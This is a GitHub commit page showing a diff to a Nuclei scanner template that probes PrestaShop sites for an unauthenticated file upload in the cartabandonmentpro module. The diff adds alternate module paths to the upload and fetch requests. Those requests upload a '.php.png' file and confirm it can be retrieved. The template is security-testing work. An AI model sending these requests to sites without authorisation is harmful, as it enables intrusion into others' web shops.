Skip to content

Commit

Permalink
additional-path-added
Browse files Browse the repository at this point in the history
  • Loading branch information
@DhiyaneshGeek
DhiyaneshGeek authored Feb 3, 2025
1 parent 35f83fe commit d3ee766
Showing 1 changed file with 12 additions and 3 deletions.
15 changes: 12 additions & 3 deletions http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -15,14 +15,15 @@ info:
product: ap_pagebuilder
vendor: apollotheme
tags: intrusive,file-upload,cartabandonmentpro,prestashop

variables:
filename: '{{rand_base(7, "abc")}}'
title: '{{rand_base(7, "abc")}}'

http:
- raw:
- |
POST /modules/cartabandonmentpro/upload.php HTTP/1.1
POST /modules/{{paths}}/upload.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=xYzZY
Expand All @@ -37,14 +38,22 @@ http:
--xYzZY--
- |
GET /modules/cartabandonmentpro/uploads/{{filename}}.php.png HTTP/1.1
GET /modules/{{paths}}/uploads/{{filename}}.php.png HTTP/1.1
Host: {{Hostname}}
payloads:
paths:
- 'cartabandonmentpro'
- 'cartabandonmentproOld'
- 'cartabandonmentpro_Old'
- 'cartabandonmentpro2'
- 'pscartabandonmentpro'

stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains(header_2, "image/png")'
- 'contains(body_1, "{{filename}}.php.png")'
- 'status_code_1 == 200 && status_code_2 == 200'
condition: and
# digest: 4a0a0047304502206e7fd1274ec8a32ba237fe97e0cec1140d289a60334a308e04e8485002058aaf022100deb3630fa4128c303b0e7cd72d3391a0374c670db5ff498077d4d8779f44e369:922c64590222798bb761d5b6d8e72950

0 comments on commit d3ee766

Please sign in to comment.